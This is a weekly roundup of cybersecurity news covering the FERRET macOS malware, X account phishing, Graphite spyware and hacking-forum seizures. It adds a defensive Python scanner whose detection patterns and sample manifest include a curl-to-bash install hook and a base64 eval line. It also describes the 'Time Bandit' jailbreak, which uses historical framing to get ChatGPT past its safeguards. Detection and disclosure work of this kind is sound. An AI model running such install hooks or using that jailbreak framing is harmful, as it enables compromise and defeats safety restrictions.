Weekly Summary Cyberattacks Jan 30th - Feb 5th
North Korean hackers target macOS with FERRET malware via fake job interviews
A group of hackers linked to North Korea has deployed macOS malware, dubbed FERRET, to infect devices via fake job interviews. The campaign, known as Contagious Interview, tricks victims by posing as recruiters on LinkedIn and asking them to install supposed video calling tools. The malware enters systems through fraudulent links and npm packages disguised as legitimate software. Its capabilities include stealing browser credentials and cryptocurrency wallets, as well as executing attacker-supplied commands on the infected computer. In addition, the attackers have diversified their tactics by spreading the malware via fake issues opened on GitHub repositories. Cybersecurity researchers warn that these attacks reflect an evolution in the threat actors' tactics, as they look for new ways to evade detection and expand their range of victims from job seekers to software developers.
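Because the summary above names npm packages as one delivery vector, the check a developer most wants is a way to spot an install-time dropper before running `npm install`. The following script is an added example, not code from the page or from any researcher it cites: it parses a package.json and flags lifecycle hooks (preinstall, install, postinstall, prepare) whose commands match a small set of heuristic indicators. The indicator patterns, the package names and both manifests are constructed for illustration and are not taken from the FERRET campaign.

```python
import json
import re

# npm runs these lifecycle hooks automatically during `npm install`, so a
# trojanized package can execute arbitrary code the moment it is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators (assumptions for this example, not a vendor signature
# set): a remote script piped into a shell, base64-wrapped payloads, inline
# node evaluation, and writes into the macOS LaunchAgents persistence path.
SUSPICIOUS_PATTERNS = {
    "remote_fetch_to_shell": re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh)\b"),
    "base64_payload": re.compile(r"base64\s+(?:-d|--decode)|Buffer\.from\([^)]*base64"),
    "inline_node_eval": re.compile(r"\bnode\s+-e\b|\beval\("),
    "launchagent_persistence": re.compile(r"Library/LaunchAgents"),
}


def audit_package_json(text: str) -> list[tuple[str, str]]:
    """Return (hook, indicator) pairs for every lifecycle script that matches
    a suspicious pattern. An empty list means no heuristic fired, which is
    not proof that the package is clean."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append((hook, name))
    return findings


# Constructed sample manifests (hypothetical package, not a real one): an
# ordinary build configuration and one with dropper-style install hooks.
BENIGN_MANIFEST = json.dumps({
    "name": "video-call-sdk",
    "version": "1.2.0",
    "scripts": {"build": "tsc -p .", "test": "jest", "prepare": "npm run build"},
})

MALICIOUS_MANIFEST = json.dumps({
    "name": "video-call-sdk",
    "version": "1.2.1",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | bash",
        "preinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\"",
    },
})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_MANIFEST), ("malicious", MALICIOUS_MANIFEST)):
        print(label, audit_package_json(manifest))
```

Run it against the package.json of each dependency before installing, or install with `npm install --ignore-scripts` and review the flagged hooks by hand; the heuristics are deliberately narrow, so a package that passes still deserves the usual scrutiny of its publisher and download history.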
Hackers step up attacks on influential accounts on X
A recent cybersecurity report has warned of a growing phishing campaign targeting influential accounts on the social network X (formerly Twitter). Hackers have taken control of the profiles of politicians, journalists, tech companies and public figures to spread scams, especially cryptocurrency-related ones. The attacks have even affected government agencies and media outlets, locking out the legitimate owners and spreading malicious links from the hijacked accounts. The cybercriminals lure victims with fake emails warning of unauthorized access to their account or of a copyright infringement. Investigations traced the activity to servers in Belize and domains registered in Turkey, although the perpetrators have not been identified.
WhatsApp reports espionage against journalists and civil society
WhatsApp has revealed that nearly 100 journalists and members of civil society were targeted in an attack using Graphite spyware, developed by the Israeli company Paragon Solutions. The Meta-owned company said it had "high confidence" that the devices of these individuals were compromised through a zero-click attack, which requires no interaction from the victim, such as opening a malicious link. Although it is unknown who ordered the attacks, WhatsApp has sent a cease-and-desist letter to Paragon and is considering legal action. The spying was reportedly stopped in December, but it is not yet known for how long those affected were exposed. Paragon, which was recently sold to the US firm AE Industrial Partners for $900 million, has faced scrutiny over its contracts with governments and agencies such as the US Department of Homeland Security. Its software, similar to NSO Group's Pegasus, gives full access to infected devices, including messages that are end-to-end encrypted in transit. WhatsApp continues to notify victims and to strengthen its measures to prevent future attacks.
Vulnerability detected in ChatGPT that allows circumvention of safety restrictions
A vulnerability has been identified in ChatGPT, called "Time Bandit", which makes it possible to evade the safeguards implemented by OpenAI and obtain restricted content on weapons manufacturing, nuclear materials and malware development. The finding was made by the artificial intelligence and cybersecurity researcher David Kuszmar, who observed that the language model exhibits a "temporal confusion" phenomenon. This flaw allows the model to be pushed into a state in which it does not distinguish between past, present and future, making it easier to extract content it would otherwise refuse. After discovering the vulnerability, Kuszmar tried without success to report his findings to OpenAI and to various government agencies; OpenAI was finally reached through the CERT Coordination Center. The attack method exploits two key weaknesses: the model's lack of temporal awareness and ambiguity in how it interprets its rules. By framing questions within a historical period, it is possible to get ChatGPT to answer with present-day information while it treats the conversation as taking place in that past context, thereby circumventing its safety constraints. Testing by researchers confirmed that this approach elicits restricted content; OpenAI has implemented mitigations and continues to work on additional measures to correct the vulnerability.
FBI dismantles hacking forums in international operation
The FBI, in collaboration with authorities in several countries, has seized the domains of the hacking forums Cracked.io and Nulled.to, known for facilitating cybercrime such as credential theft and brute-force attacks. The action is part of "Operation Talent", in which other sites such as StarkRDP.io, MySellix.io and Sellix.io, linked to the sale of stolen data and illicit software, have also been shut down. Users who try to access the sites now encounter error messages or banners informing them of the seizure. The Cracked.io team has acknowledged the intervention on its Telegram channel, noting that it is still awaiting official documentation on the case. Europol has confirmed that the operation is still ongoing, and more information is expected soon.